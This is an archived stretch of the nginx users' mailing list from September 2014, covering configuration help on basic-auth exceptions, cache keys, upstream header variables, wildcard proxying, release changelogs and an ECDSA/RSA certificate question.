<9bfca9ad32e7daaba52eeaa55c8dac0a.NginxMailingListEnglish@forum.nginx.org> Message-ID: Never mind - a new proxy target was misconfigured. Doh! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253313,253318#msg-253318 From steve at greengecko.co.nz Tue Sep 16 23:18:43 2014 From: steve at greengecko.co.nz (Steve Holdoway) Date: Wed, 17 Sep 2014 11:18:43 +1200 Subject: password protect site except for one page Message-ID: <1410909523.3094.309.camel@steve-new> Hi folks, Does anyone have a nifty solution for this? The problem is that it's a WordPress site, so just

location / {
    auth_basic "Coming soon...";
    auth_basic_user_file /etc/nginx/security/lock;
    ...
}
location /demo {
    auth_basic off;
    ...
}

doesn't work for /demo due to static content, etc. The only way I can think of is to directly lock the other pages rather than /. Thoughts?
Steve -- Steve Holdoway BSc(Hons) MIITP http://www.greengecko.co.nz Linkedin: http://www.linkedin.com/in/steveholdoway Skype: sholdowa From kworthington at gmail.com Wed Sep 17 01:15:57 2014 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 16 Sep 2014 21:15:57 -0400 Subject: [nginx-announce] nginx-1.6.2 In-Reply-To: <20140916144657.GM59236@mdounin.ru> References: <20140916144657.GM59236@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.6.2 for Windows http://goo.gl/ioBvGK (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available via: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Sep 16, 2014 at 10:46 AM, Maxim Dounin wrote: > Changes with nginx 1.6.2 16 Sep > 2014 > > *) Security: it was possible to reuse SSL sessions in unrelated > contexts > if a shared SSL session cache or the same TLS session ticket key was > used for multiple "server" blocks (CVE-2014-3616). > Thanks to Antoine Delignat-Lavaud. > > *) Bugfix: requests might hang if resolver was used and a DNS server > returned a malformed response; the bug had appeared in 1.5.8. > > *) Bugfix: requests might hang if resolver was used and a timeout > occurred during a DNS request. > > > -- > Maxim Dounin > http://nginx.org/en/donation.html > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From kworthington at gmail.com Wed Sep 17 01:22:20 2014 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 16 Sep 2014 21:22:20 -0400 Subject: [nginx-announce] nginx-1.7.5 In-Reply-To: <20140916144625.GI59236@mdounin.ru> References: <20140916144625.GI59236@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.7.5 for Windows http://goo.gl/pTAVLA (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available via: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Sep 16, 2014 at 10:46 AM, Maxim Dounin wrote: > Changes with nginx 1.7.5 16 Sep > 2014 > > *) Security: it was possible to reuse SSL sessions in unrelated > contexts > if a shared SSL session cache or the same TLS session ticket key was > used for multiple "server" blocks (CVE-2014-3616). > Thanks to Antoine Delignat-Lavaud. > > *) Change: now the "stub_status" directive does not require a > parameter. > > *) Feature: the "always" parameter of the "add_header" directive. > > *) Feature: the "proxy_next_upstream_tries", > "proxy_next_upstream_timeout", "fastcgi_next_upstream_tries", > "fastcgi_next_upstream_timeout", "memcached_next_upstream_tries", > "memcached_next_upstream_timeout", "scgi_next_upstream_tries", > "scgi_next_upstream_timeout", "uwsgi_next_upstream_tries", and > "uwsgi_next_upstream_timeout" directives. > > *) Bugfix: in the "if" parameter of the "access_log" directive. > > *) Bugfix: in the ngx_http_perl_module. > Thanks to Piotr Sikora. > > *) Bugfix: the "listen" directive of the mail proxy module did not > allow > to specify more than two parameters. 
> > *) Bugfix: the "sub_filter" directive did not work with a string to > replace consisting of a single character. > > *) Bugfix: requests might hang if resolver was used and a timeout > occurred during a DNS request. > > *) Bugfix: in the ngx_http_spdy_module when using with AIO. > > *) Bugfix: a segmentation fault might occur in a worker process if the > "set" directive was used to change the "$http_...", > "$sent_http_...", > or "$upstream_http_..." variables. > > *) Bugfix: in memory allocation error handling. > Thanks to Markus Linnala and Feng Gu. > > > -- > Maxim Dounin > http://nginx.org/en/donation.html > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Sep 17 01:34:28 2014 From: nginx-forum at nginx.us (aircw) Date: Tue, 16 Sep 2014 21:34:28 -0400 Subject: How to sort parameters in nginx cache key In-Reply-To: <3214902.JcCVj3zQQe@vbart-laptop> References: <3214902.JcCVj3zQQe@vbart-laptop> Message-ID: Valentin: I forgot to mention that the number of parameters is very big (> 100) and keeps growing. So manual sort is not an option :(. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253315,253323#msg-253323 From thunderhill4 at gmail.com Wed Sep 17 05:24:40 2014 From: thunderhill4 at gmail.com (thunder hill) Date: Wed, 17 Sep 2014 10:54:40 +0530 Subject: tomcat https server behind nginx and bad gateway Message-ID: Hi, I have a tomcat server running behind nginx proxy. When I access the nginx from browser it is throwing bad gateway error. According to the tomcat application developer nginx is unable to import the ssl certs. How to import certs in to nginx? Any pointers? 
the setup is as follows: browser http req --> http://nginx_rps https req ---> https://authwebser:443 This is in continuation of my previous post http://mailman.nginx.org/pipermail/nginx/2014-September/045115.html -- T -------------- next part -------------- An HTML attachment was scrubbed... URL: From artemrts at ukr.net Wed Sep 17 05:49:36 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 08:49:36 +0300 Subject: Response header from fcgi server Message-ID: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> Hi, The PHP application sends a response with the HTTP header X-Language and I need to pass this to nginx. With Firebug I see this header, but the variable $http_x_language or $sent_http_x_language is empty. What am I doing wrong? From artemrts at ukr.net Wed Sep 17 06:35:59 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 09:35:59 +0300 Subject: Response header from fcgi server In-Reply-To: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> Message-ID: <1410935671.307782883.9zczp9va@frv34.fwdcdn.com> --- Original message --- From: "wishmaster" Date: 17 September 2014, 08:49:51 > Hi, > > The PHP application sends a response with the HTTP header X-Language and I need to pass this to nginx. > With Firebug I see this header, but the variable $http_x_language or $sent_http_x_language is empty. > > What am I doing wrong? > Hmm... Interesting. I have changed the header from "X-Language" to something like "Currlang" and now I see the variable $sent_http_currlang. 
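The stages these variables belong to can be told apart quickly by logging all three side by side. A debugging sketch (the layout is an assumption, not the poster's config; the header name X-Language is taken from the thread):

```nginx
# In the http{} block: one log line showing where the header is visible.
log_format hdr_debug '$request '
                     'from_client=$http_x_language '
                     'from_upstream=$upstream_http_x_language '
                     'sent_to_client=$sent_http_x_language';

# In the affected server{} or location{}:
access_log /var/log/nginx/hdr_debug.log hdr_debug;
```

Each request then records the header as seen in the client request, in the upstream response, and in the response nginx finally sent, which makes it obvious which variable is empty and at what point.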
From francis at daoine.org Wed Sep 17 07:06:33 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:06:33 +0100 Subject: Response header from fcgi server In-Reply-To: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> Message-ID: <20140917070633.GC3771@daoine.org> On Wed, Sep 17, 2014 at 08:49:36AM +0300, wishmaster wrote: Hi there, > PHP-application sends response with HTTP header X-Language and I need pass this to nginx. > With Firebug I see this header, but variable $http_x_language or $sent_http_x_language is empty. > > What I am doing wrong? $http_x_language is a request header field -- what the client sent to nginx. $sent_http_x_language is a response header field -- what nginx sent to the client. $upstream_http_x_language would be what an upstream sent to nginx. What do you do? What do you see? What do you expect to see? f -- Francis Daly francis at daoine.org From francis at daoine.org Wed Sep 17 07:10:02 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:10:02 +0100 Subject: password protect site except for one page In-Reply-To: <1410909523.3094.309.camel@steve-new> References: <1410909523.3094.309.camel@steve-new> Message-ID: <20140917071002.GD3771@daoine.org> On Wed, Sep 17, 2014 at 11:18:43AM +1200, Steve Holdoway wrote: Hi there, > Does anyone have a nifty solution for this? The problem is that it's a > wordpress site, so just > > location / { > auth_basic "Coming soon..."; > auth_basic_user_file /etc/nginx/security/lock; > ... > } > > location /demo { > auth_basic off; > ... > } > > doesn't work for /demo due to static content, etc. location /static {} ? What are the urls that you do want to password-protect, and what are the urls that you do not want to password-protect? ("one page" appears not to be "one url".) Alternatively, could you put all of your "demo" content below /demo? 
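A concrete sketch of that shape (the asset paths /wp-content and /wp-includes are assumptions about what the demo page loads, and PHP handling is omitted for brevity):

```nginx
server {
    listen 80;
    root /var/www/wordpress;

    # Locked by default at server level...
    auth_basic "Coming soon...";
    auth_basic_user_file /etc/nginx/security/lock;

    # ...and switched off for the demo page and its static assets
    # (hypothetical paths; adjust to what the demo actually loads).
    location /demo        { auth_basic off; }
    location /wp-content  { auth_basic off; }
    location /wp-includes { auth_basic off; }

    location / { }
}
```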
f -- Francis Daly francis at daoine.org From francis at daoine.org Wed Sep 17 07:17:07 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:17:07 +0100 Subject: trouble changing uri to query string In-Reply-To: References: Message-ID: <20140917071707.GE3771@daoine.org> On Mon, Sep 15, 2014 at 02:57:34PM +0300, Roland RoLaNd wrote: Hi there, this is all untested by me... > I have a url looking as such: mysite.com/some/path/rest/v2/giveit.view&user=282&imageid=23&size=80 > > I want the cache key to match imageid=23&size=80 without the "user" part. You could try using "map" to define a variable which is 'the url without the part that matches "user=[0-9]+&"', and then use that in the cache key, perhaps? > $args isn't matching because incoming url lacks the "?" part, so $uri is detected as mysite.com/some/path/rest/v2/giveit.view&imageid=23&size=80 $uri probably starts with the character "/". > Is there a way I could force nginx to detect that query string, or rewrite/set the args on each request ? There is no query string. You may find it easier to switch to "standard" http/cgi-like urls. But that's a separate thing. f -- Francis Daly francis at daoine.org From artemrts at ukr.net Wed Sep 17 07:20:49 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 10:20:49 +0300 Subject: Response header from fcgi server In-Reply-To: <20140917070633.GC3771@daoine.org> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> Message-ID: <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> 
> > $http_x_language is a request header field -- what the client sent > to nginx. > > $sent_http_x_language is a response header field -- what nginx sent to > the client. > > $upstream_http_x_language would be what an upstream sent to nginx. > > What do you do? What do you see? What do you expect to see? > Oh Francis, you helped save me a lot of time as always, thanks. I did not know about the $upstream_* variables. Without fastcgi caching, $sent_http_x_language is not empty, but if caching is "ON", the $sent_http_x_language variable is empty. But $upstream_* contains the expected data. Thanks a lot! -- Cheers, Vitaliy From francis at daoine.org Wed Sep 17 07:23:04 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:23:04 +0100 Subject: nginx as a forward proxy (kind of) In-Reply-To: <65918e4ea8fbcb834d4a93c1be8345bb@ruby-forum.com> References: <65918e4ea8fbcb834d4a93c1be8345bb@ruby-forum.com> Message-ID: <20140917072304.GF3771@daoine.org> On Sun, Sep 14, 2014 at 12:28:30AM +0200, Sam J. wrote: Hi there, > I am very new to nginx and have a quick question. > I am using nginx to basically redirect certain websites through another > proxy. I am using DNS to resolve *.domain.com to the IP address of > nginx server. > I am able to get it to work with www.domain.com (see sample config > below) but would like it to redirect any subdomain (wildcard) to > corresponding subdomain. Any way to do this without having a similar > config for each subdomain? http://nginx.org/r/proxy_pass See the part mentioning variables. Note that nginx is a reverse proxy, which pretty much means that you control the upstream(s). It can act sort-of like a normal proxy in your controlled environment; but if you want a proxy, get a proxy and you'll be happier. And because you use ssl, to keep the browser happy you will want to make sure that your certificate fits whatever hostname the browser requests. (Or configure the browser not to care about man-in-the-middle attacks.) 
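A sketch of the variable form that page describes (the resolver address and certificate paths are illustrative; a resolver directive is required because the upstream host is only known at request time when proxy_pass contains variables):

```nginx
server {
    listen 443 ssl;
    # Matches every subdomain, so one block covers them all.
    server_name *.domain.com;

    # Must be a wildcard (or otherwise matching) certificate,
    # per the note above about keeping the browser happy.
    ssl_certificate     /etc/nginx/ssl/wildcard.domain.com.crt;
    ssl_certificate_key /etc/nginx/ssl/wildcard.domain.com.key;

    resolver 8.8.8.8;

    location / {
        proxy_set_header Host $host;
        # $host carries the requested subdomain through unchanged.
        proxy_pass https://$host$request_uri;
    }
}
```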
f -- Francis Daly francis at daoine.org From francis at daoine.org Wed Sep 17 07:27:29 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 08:27:29 +0100 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) In-Reply-To: References: Message-ID: <20140917072729.GG3771@daoine.org> On Fri, Sep 12, 2014 at 04:37:24AM -0400, antoniofernandez wrote: Hi there, > I have two index.php files : > > /public/index.php > /index.php > > > The content of /index.php file is : > > ----------------------------- content ------------------------- > ./public/index.php > ------------------------------------------------------------------ nginx doesn't "do" php. It is probably worth checking the logs of your fastcgi server to see what is going on. Or maybe your browser is trying to be clever -- what http response do you get for the initial request? Do you see one or two requests made by the browser when you test (you can check the nginx logs to see that). f -- Francis Daly francis at daoine.org From me at myconan.net Wed Sep 17 07:47:07 2014 From: me at myconan.net (Edho Arief) Date: Wed, 17 Sep 2014 16:47:07 +0900 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) In-Reply-To: <20140917072729.GG3771@daoine.org> References: <20140917072729.GG3771@daoine.org> Message-ID: > On Fri, Sep 12, 2014 at 04:37:24AM -0400, antoniofernandez wrote: > > Hi there, > >> I have two index.php files : >> >> /public/index.php >> /index.php >> >> >> The content of /index.php file is : >> >> ----------------------------- content ------------------------- >> ./public/index.php >> ------------------------------------------------------------------ > If it's a git repository checkout, it's probably caused by your Windows git build treating symlink files as plain-text files containing the literal target path. 
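That diagnosis can be checked directly, since git records a symlink with a distinct file mode in the index. A demonstration in a throwaway repo (the file name matches the thread; the target path is illustrative):

```shell
# Build a throwaway repo containing a symlink like the thread's index.php.
set -e
tmp=$(mktemp -d) && cd "$tmp"
git init -q .
mkdir public && echo '<?php ?>' > public/index.php
ln -s ./public/index.php index.php
git add .
# Mode 120000 marks a symlink object; 100644 would be a regular file.
git ls-files -s index.php
# On a build where symlinks are unsupported (core.symlinks=false, the
# usual case on Windows), checkout writes index.php as a plain file whose
# content is the literal target path -- exactly what the poster saw.
```

So the repository itself is fine; only the checkout on the Windows side turns the link into a one-line text file.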
From nginx-forum at nginx.us Wed Sep 17 07:51:12 2014 From: nginx-forum at nginx.us (antoniofernandez) Date: Wed, 17 Sep 2014 03:51:12 -0400 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) In-Reply-To: <20140917072729.GG3771@daoine.org> References: <20140917072729.GG3771@daoine.org> Message-ID: <72af3c50b091b2ed1b2ee45d4af54843.NginxMailingListEnglish@forum.nginx.org> Hi Francis, thanks for the reply. The problem was just a misunderstanding between the NTFS filesystem and EXT3 in Linux. The index.php file is a symbolic link, but Windows doesn't recognize symbolic links; that explains the different behaviour. Regards, Antonio Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253207,253335#msg-253335 From nginx-forum at nginx.us Wed Sep 17 07:57:13 2014 From: nginx-forum at nginx.us (antoniofernandez) Date: Wed, 17 Sep 2014 03:57:13 -0400 Subject: Extrange behaviour with index.php and a plain link ( windows vs linux ? ) In-Reply-To: References: Message-ID: <3cfaa895fb3c5d910689117f7fabfc5e.NginxMailingListEnglish@forum.nginx.org> Hi Edho, That's it, exactly my problem. Thanks a lot, Regards, Antonio Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253207,253336#msg-253336 From shahzaib.cb at gmail.com Wed Sep 17 11:25:12 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Wed, 17 Sep 2014 16:25:12 +0500 Subject: zero size buf in output !! In-Reply-To: <20140827171624.GX1849@mdounin.ru> References: <20140827171624.GX1849@mdounin.ru> Message-ID: Hi Maxim, Upgraded nginx to 1.7.4 and it looks like the issue is gone. Regards. Shahzaib On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin wrote: > Hello! > > On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: > > > We're facing following error on edge server with nginx-1.6.1, using > > proxy_store on edge. 
> > > > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 > r:0 > > f:0 0000000002579840 0000000002579840-000000000257A840 0000000000000000 > 0-0 > > while sending to client, client: 119.160.118.123, server: > > storage4.content.com, request: "GET > > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " > > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", > host: " > > storage4.content.com" > > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 > r:0 > > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 0000000000000000 > 0-0 > > while sending to client, client: 121.52.147.68, server: > storage9.content.com, > > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 HTTP/1.1", > > upstream: " > > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4", > > host: "storage9.content.com", referrer: " > > http://files.com/video/2618018/aashiqui-3-new-songs" > > > > nginx version: nginx/1.6.1 > > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) > > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx > > --conf-path=/etc/nginx/nginx.conf > --error-log-path=/var/log/nginx/error.log > > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid > > --lock-path=/var/run/nginx.lock > > --http-client-body-temp-path=/var/cache/nginx/client_temp > > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx > > --group=nginx --with-http_flv_module --with-http_mp4_module > > You may want to try 1.7.4 to see if it helps (there are some > potentially related changes in nginx 1.7.3). > > If it doesn't, providing debug log may be helpful. See > http://wiki.nginx.org/Debugging for more hints. 
> > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Wed Sep 17 12:29:39 2014 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Wed, 17 Sep 2014 17:29:39 +0500 Subject: zero size buf in output !! In-Reply-To: References: <20140827171624.GX1849@mdounin.ru> Message-ID: Well, i again received the same error but its much improvement in time frame. If the error was occurring after each 5min, now the same error is occurring after 30~50min. The conclusion is, nginx-1.7.4 is not 100% bug free from this issue. 2014/09/17 17:22:48 [alert] 28559#0: *27961 zero size buf in output t:0 r:0 f:0 000000000477EE20 000000000477EE20-000000000477FE20 0000000000000000 0-0 while sending to client, client: 115.167.75.22, server: ldx.files.com, request: "GET /files/videos/2014/09/04/140984890338bc7-240.mp4 HTTP/1.1", [root at tw data]# nginx -V nginx version: nginx/1.7.4 built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx --group=nginx --with-http_flv_module --with-http_mp4_module You have mail in /var/spool/mail/root Regards. Shahzaib On Wed, Sep 17, 2014 at 4:25 PM, shahzaib shahzaib wrote: > Hi Maxim, > > Upgraded nginx to 1.7.4 and looks like the issue is gone. > > Regards. > Shahzaib > > > On Wed, Aug 27, 2014 at 10:16 PM, Maxim Dounin wrote: > >> Hello! 
>> >> On Wed, Aug 27, 2014 at 08:48:19PM +0500, shahzaib shahzaib wrote: >> >> > We're facing following error on edge server with nginx-1.6.1, using >> > proxy_store on edge. >> > >> > 2014/08/27 20:35:05 [alert] 5701#0: *21244 zero size buf in output t:0 >> r:0 >> > f:0 0000000002579840 0000000002579840-000000000257A840 0000000000000000 >> 0-0 >> > while sending to client, client: 119.160.118.123, server: >> > storage4.content.com, request: "GET >> > /files/videos/2013/06/30/137256108550d07-m.mp4 HTTP/1.1", upstream: " >> > http://82.2.37.87:80/files/videos/2013/06/30/137256108550d07-m.mp4", >> host: " >> > storage4.content.com" >> > 2014/08/27 20:35:28 [alert] 5687#0: *26261 zero size buf in output t:0 >> r:0 >> > f:0 0000000004F5F2D0 0000000004F5F2D0-0000000004F602D0 0000000000000000 >> 0-0 >> > while sending to client, client: 121.52.147.68, server: >> storage9.content.com, >> > request: "GET /files/videos/2014/04/21/1398060531bb2e3-360.mp4 >> HTTP/1.1", >> > upstream: " >> > http://9.7.248.180:80/files/videos/2014/04/21/1398060531bb2e3-360.mp4", >> > host: "storage9.content.com", referrer: " >> > http://files.com/video/2618018/aashiqui-3-new-songs" >> > >> > nginx version: nginx/1.6.1 >> > built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) >> > configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx >> > --conf-path=/etc/nginx/nginx.conf >> --error-log-path=/var/log/nginx/error.log >> > --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid >> > --lock-path=/var/run/nginx.lock >> > --http-client-body-temp-path=/var/cache/nginx/client_temp >> > --http-proxy-temp-path=/var/cache/nginx/proxy_temp --user=nginx >> > --group=nginx --with-http_flv_module --with-http_mp4_module >> >> You may want to try 1.7.4 to see if it helps (there are some >> potentially related changes in nginx 1.7.3). >> >> If it doesn't, providing debug log may be helpful. See >> http://wiki.nginx.org/Debugging for more hints. 
>> >> -- >> Maxim Dounin >> http://nginx.org/ >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From artemrts at ukr.net Wed Sep 17 14:22:14 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 17:22:14 +0300 Subject: Response header from fcgi server In-Reply-To: <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> Message-ID: <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> --- Original message --- From: "wishmaster" Date: 17 September 2014, 10:21:03 > > > > --- Original message --- > From: "Francis Daly" > Date: 17 September 2014, 10:06:47 > > > > > On Wed, Sep 17, 2014 at 08:49:36AM +0300, wishmaster wrote: > > > > Hi there, > > > > > PHP-application sends response with HTTP header X-Language and I need pass this to nginx. > > > With Firebug I see this header, but variable $http_x_language or $sent_http_x_language is empty. > > > > > > What I am doing wrong? > > > > $http_x_language is a request header field -- what the client sent > > to nginx. > > > > $sent_http_x_language is a response header field -- what nginx sent to > > the client. > > > > $upstream_http_x_language would be what an upstream sent to nginx. > > > > What do you do? What do you see? What do you expect to see? > > > Oh Francis, you help save me a lot of time as always, thanks. > I did not know about $upstream_* variable > > Without fastcgi caching, $sent_http_x_language is not empty, but if chaching is "ON", $sent_http_x_language variable is empty. But $upstream_* contain expected data. > My problem is still actual. I am attempting to use http header from fastcgi server as part of cache key. 
$upstream_http_x_language contains value, but empty in cache key Part of cached page: KEY: httpGETexample.comfoto-video-audio/videoUAH ?Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Last-Modified: Wed, 17 Sep 2014 13:59:43 GMT Cache-Control: private X-Language: uk X-Accel-Buffering: yes key must be httpGETexample.comfoto-video-audio/videoukUAH -- w From francis at daoine.org Wed Sep 17 14:29:33 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 15:29:33 +0100 Subject: Response header from fcgi server In-Reply-To: <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> Message-ID: <20140917142933.GI3771@daoine.org> On Wed, Sep 17, 2014 at 05:22:14PM +0300, wishmaster wrote: Hi there, > My problem is still actual. > I am attempting to use http header from fastcgi server as part of cache key. > $upstream_http_x_language contains value, but empty in cache key How should that work? A request comes in to nginx. nginx creates the cache key to see if it should serve the request from cache, or should pass the request along to upstream and store the response in cache. If you try to put something into your cache key that nginx can only know about after the request has been passed upstream, you are going to have a problem. > Part of cached page: > > KEY: httpGETexample.comfoto-video-audio/videoUAH > key must be > httpGETexample.comfoto-video-audio/videoukUAH Why does this matter? What two requests would lead to upstream sending content with a different language? Use whatever is different in those requests in your cache key. 
f -- Francis Daly francis at daoine.org From artemrts at ukr.net Wed Sep 17 14:42:18 2014 From: artemrts at ukr.net (wishmaster) Date: Wed, 17 Sep 2014 17:42:18 +0300 Subject: Response header from fcgi server In-Reply-To: <20140917142933.GI3771@daoine.org> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> <20140917142933.GI3771@daoine.org> Message-ID: <1410964781.6387807.dvckan69@frv34.fwdcdn.com> --- Original message --- From: "Francis Daly" Date: 17 September 2014, 17:29:43 > On Wed, Sep 17, 2014 at 05:22:14PM +0300, wishmaster wrote: > > Hi there, > > > My problem is still actual. > > I am attempting to use http header from fastcgi server as part of cache key. > > $upstream_http_x_language contains value, but empty in cache key > > How should that work? > > A request comes in to nginx. > > nginx creates the cache key to see if it should serve the request from > cache, or should pass the request along to upstream and store the response > in cache. > > If you try to put something into your cache key that nginx can only know > about after the request has been passed upstream, you are going to have > a problem. I know how this works. > > > Part of cached page: > > > > KEY: httpGETexample.comfoto-video-audio/videoUAH > > > key must be > > httpGETexample.comfoto-video-audio/videoukUAH > > Why does this matter? > > What two requests would lead to upstream sending content with a different > language? Use whatever is different in those requests in your cache key. At this time cache key uses $cookie_language, this works as expected. But I do not understand why with $http_ or $upstream_ does not work. 
From shmick at riseup.net Wed Sep 17 15:17:35 2014 From: shmick at riseup.net (shmick at riseup.net) Date: Thu, 18 Sep 2014 01:17:35 +1000 Subject: 2 certs, 1 domain, 1 IP In-Reply-To: <54184F09.6090205@riseup.net> References: <54184F09.6090205@riseup.net> Message-ID: <5419A60F.9020707@riseup.net> It works with Postfix; I guess it doesn't in nginx. Feature request? nginx: [emerg] "ssl_certificate" directive is duplicate in /etc/nginx.conf:53 nginx: configuration file /etc/nginx.conf test failed shmick at riseup.net wrote: > is it possible with SNI and nginx to have both an ECDSA and RSA cert > serving 1 website on 1 IP ? > > best practices ? > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > From francis at daoine.org Wed Sep 17 22:08:30 2014 From: francis at daoine.org (Francis Daly) Date: Wed, 17 Sep 2014 23:08:30 +0100 Subject: Response header from fcgi server In-Reply-To: <1410964781.6387807.dvckan69@frv34.fwdcdn.com> References: <1410932557.270021147.18wp6qv1@frv34.fwdcdn.com> <20140917070633.GC3771@daoine.org> <1410938218.792524225.b7fjh47y@frv34.fwdcdn.com> <1410963371.70523740.56ue7kru@frv34.fwdcdn.com> <20140917142933.GI3771@daoine.org> <1410964781.6387807.dvckan69@frv34.fwdcdn.com> Message-ID: <20140917220830.GJ3771@daoine.org> On Wed, Sep 17, 2014 at 05:42:18PM +0300, wishmaster wrote: > > What two requests would lead to upstream sending content with a different > > language? Use whatever is different in those requests in your cache key. > > At this time cache key uses $cookie_language, this works as expected. But I do not understand why with $http_ or $upstream_ does not work. > $http_ comes from the client, so it should work. $upstream_ is empty until after upstream has responded, which is too late to be used in a cache key. 
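Put together, the working arrangement keys the cache only on request-time data, as in the $cookie_language setup mentioned above. A sketch (the zone name and socket path are illustrative, and it assumes a fastcgi_cache_path declared at http{} level):

```nginx
# http{} level (illustrative zone):
#   fastcgi_cache_path /var/cache/nginx/fcgi keys_zone=lang_cache:10m;

location ~ \.php$ {
    fastcgi_cache lang_cache;
    # $cookie_language arrives with the request, so it can vary the key;
    # $upstream_http_x_language is still empty when the key is computed.
    fastcgi_cache_key "$scheme$request_method$host$request_uri$cookie_language";
    fastcgi_cache_valid 200 10m;
    include fastcgi_params;
    fastcgi_pass unix:/var/run/php-fpm.sock;
}
```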
